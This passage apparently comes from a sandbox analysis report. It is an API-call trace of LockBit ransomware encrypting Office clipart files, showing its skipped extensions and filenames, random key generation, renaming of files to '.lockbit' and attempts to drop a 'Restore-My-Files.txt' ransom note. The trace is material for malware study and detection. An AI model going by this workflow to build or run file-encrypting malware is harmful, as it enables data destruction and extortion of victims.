BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3f3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3f3004c) returned 0x0 [0141.554] ReadFile (in: hFile=0x308, lpBuffer=0x3ef003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3ef0008 | out: lpBuffer=0x3ef003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3ef0008) returned 1 [0141.560] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107290.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107290.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0141.560] malloc (_Size=0xa6) returned 0x77d7a8 [0141.560] NtSetInformationFile (FileHandle=0x308, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d7a8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0141.561] free (_Block=0x77d7a8) [0141.561] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107290.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0141.561] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0141.561] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0141.561] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7502c600, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x5636ddf0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x7502c600, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x99c, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0107300.WMF", cAlternateFileName="")) returned 1 [0141.561] lstrcmpiW (lpString1=".", lpString2="J0107300.WMF") returned -1 [0141.561] lstrcmpiW (lpString1="..", lpString2="J0107300.WMF") returned -1 [0141.561] PathFindExtensionW (pszPath="J0107300.WMF") returned=".WMF" [0141.561] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0141.561] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0141.562] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0141.562] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0141.562] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0141.562] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0141.562] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0141.562] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0141.562] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0141.562] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0141.562] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0141.562] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0141.562] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0141.562] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0141.562] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0141.562] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0141.562] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0141.562] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0141.562] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0141.562] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0141.562] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0141.562] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0141.562] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0141.563] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0141.563] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0141.563] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0141.563] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0141.563] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0141.563] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0141.563] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0141.563] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0141.563] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0141.563] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0141.563] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0141.563] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0141.563] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0141.563] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0141.563] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0141.563] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0141.563] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0141.563] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0141.563] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0141.564] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0141.564] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0141.564] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0141.564] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0141.564] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0141.564] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0107300.WMF") returned 1 [0141.564] lstrcmpiW (lpString1="ntldr", lpString2="J0107300.WMF") returned 1 [0141.564] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0107300.WMF") returned 1 [0141.564] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0107300.WMF") returned -1 [0141.564] lstrcmpiW (lpString1="autorun.inf", lpString2="J0107300.WMF") returned -1 [0141.564] lstrcmpiW (lpString1="thumbs.db", lpString2="J0107300.WMF") returned 1 [0141.564] lstrcmpiW (lpString1="iconcache.db", lpString2="J0107300.WMF") returned -1 [0141.564] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0141.564] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107300.WMF") returned=".WMF" [0141.564] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0141.564] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0141.564] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0141.564] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0141.564] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0141.564] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0141.565] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0141.565] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0141.565] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0141.565] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0141.565] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0141.565] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0141.565] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0141.565] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0141.565] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0141.565] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0141.565] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0141.565] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0141.565] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0141.565] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0141.565] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0141.565] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0141.565] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0141.565] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0141.565] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0141.565] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0141.565] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0141.566] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0141.566] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107300.WMF.lockbit") returned 72 [0141.566] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107300.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107300.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x170 [0141.566] CreateIoCompletionPort (FileHandle=0x170, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0141.566] malloc (_Size=0x40068) returned 0x3df0008 [0141.567] GetFileSizeEx (in: hFile=0x170, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=2460) returned 1 [0141.567] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0141.567] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0141.567] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0141.567] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0141.568] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0141.568] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0141.568] ReadFile (in: hFile=0x170, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 0x0 [0141.573] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107300.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107300.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0141.573] malloc (_Size=0xa6) returned 0x77d7a8 [0141.573] NtSetInformationFile (FileHandle=0x170, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d7a8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0141.574] free (_Block=0x77d7a8) [0141.574] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107300.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0141.574] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0141.574] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0141.574] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7502c600, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x56393f50, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x7502c600, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x1028, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0107302.WMF", cAlternateFileName="")) returned 1 [0141.575] lstrcmpiW (lpString1=".", lpString2="J0107302.WMF") returned -1 [0141.575] lstrcmpiW (lpString1="..", lpString2="J0107302.WMF") returned -1 [0141.575] PathFindExtensionW (pszPath="J0107302.WMF") returned=".WMF" [0141.575] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0141.575] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0141.575] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0141.575] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0141.575] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0141.575] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0141.575] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0141.575] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0141.575] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0141.575] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0141.575] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0141.575] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0141.575] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0141.575] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0141.575] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0141.575] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0141.575] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0141.576] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0141.576] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0141.576] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0141.576] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0141.576] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0141.576] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0141.576] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0141.576] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0141.576] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0141.576] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0141.576] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0141.576] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0141.576] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0141.576] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0141.576] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0141.576] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0141.576] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0141.576] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0141.576] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0141.576] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0141.576] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0141.577] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0141.577] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0141.577] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0141.577] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0141.577] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0141.577] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0141.577] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0141.577] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0141.577] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0141.577] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0107302.WMF") returned 1 [0141.577] lstrcmpiW (lpString1="ntldr", lpString2="J0107302.WMF") returned 1 [0141.577] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0107302.WMF") returned 1 [0141.577] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0107302.WMF") returned -1 [0141.577] lstrcmpiW (lpString1="autorun.inf", lpString2="J0107302.WMF") returned -1 [0141.577] lstrcmpiW (lpString1="thumbs.db", lpString2="J0107302.WMF") returned 1 [0141.577] lstrcmpiW (lpString1="iconcache.db", lpString2="J0107302.WMF") returned -1 [0141.577] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0141.577] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107302.WMF") returned=".WMF" [0141.577] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0141.577] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0141.578] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0141.578] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0141.578] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0141.578] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0141.578] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0141.578] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0141.578] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0141.578] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0141.578] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0141.578] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0141.578] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0141.578] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0141.578] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0141.578] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0141.578] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0141.578] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0141.578] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0141.578] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0141.578] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0141.578] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0141.578] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0141.579] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0141.579] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0141.579] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0141.579] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0141.579] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0141.579] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107302.WMF.lockbit") returned 72 [0141.579] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107302.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107302.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3cc [0141.585] CreateIoCompletionPort (FileHandle=0x3cc, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0141.585] malloc (_Size=0x40068) returned 0x3d70450 [0141.585] GetFileSizeEx (in: hFile=0x3cc, lpFileSize=0x3d70468 | out: lpFileSize=0x3d70468*=4136) returned 1 [0141.585] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0141.585] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0141.585] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db0484, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db0484) returned 0x0 [0141.585] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0141.586] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0141.586] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db0494, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db0494) returned 0x0 [0141.586] ReadFile (in: hFile=0x3cc, lpBuffer=0x3d70484, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450) returned 0x0 [0141.589] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107302.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107302.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0141.589] malloc (_Size=0xa6) returned 0x77d7a8 [0141.590] NtSetInformationFile (FileHandle=0x3cc, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d7a8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0141.591] free (_Block=0x77d7a8) [0141.591] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107302.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0141.591] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0141.591] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0141.591] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7502c600, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x56393f50, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x7502c600, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x3e10, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0107308.WMF", cAlternateFileName="")) returned 1 [0141.591] lstrcmpiW (lpString1=".", lpString2="J0107308.WMF") returned -1 [0141.591] lstrcmpiW (lpString1="..", lpString2="J0107308.WMF") returned -1 [0141.591] PathFindExtensionW (pszPath="J0107308.WMF") returned=".WMF" [0141.591] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0141.591] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0141.591] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0141.591] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0141.591] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0141.591] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0141.591] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0141.591] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0141.592] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0141.592] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0141.592] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0141.592] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0141.592] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0141.592] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0141.592] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0141.592] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0141.592] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0141.592] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0141.592] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0141.592] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0141.592] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0141.592] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0141.592] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0141.592] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0141.592] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0141.592] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0141.592] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0141.592] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0141.592] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0141.592] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0141.593] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0141.593] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0141.593] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0141.593] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0141.593] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0141.593] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0141.593] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0141.593] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0141.593] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0141.593] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0141.593] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0141.593] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0141.593] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0141.593] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0141.593] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0141.593] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0141.593] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0141.593] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0107308.WMF") returned 1 [0141.593] lstrcmpiW (lpString1="ntldr", lpString2="J0107308.WMF") returned 1 [0141.593] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0107308.WMF") returned 1 [0141.593] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0107308.WMF") returned -1 [0141.593] lstrcmpiW (lpString1="autorun.inf", lpString2="J0107308.WMF") returned -1 [0141.593] lstrcmpiW (lpString1="thumbs.db", lpString2="J0107308.WMF") returned 1 [0141.593] 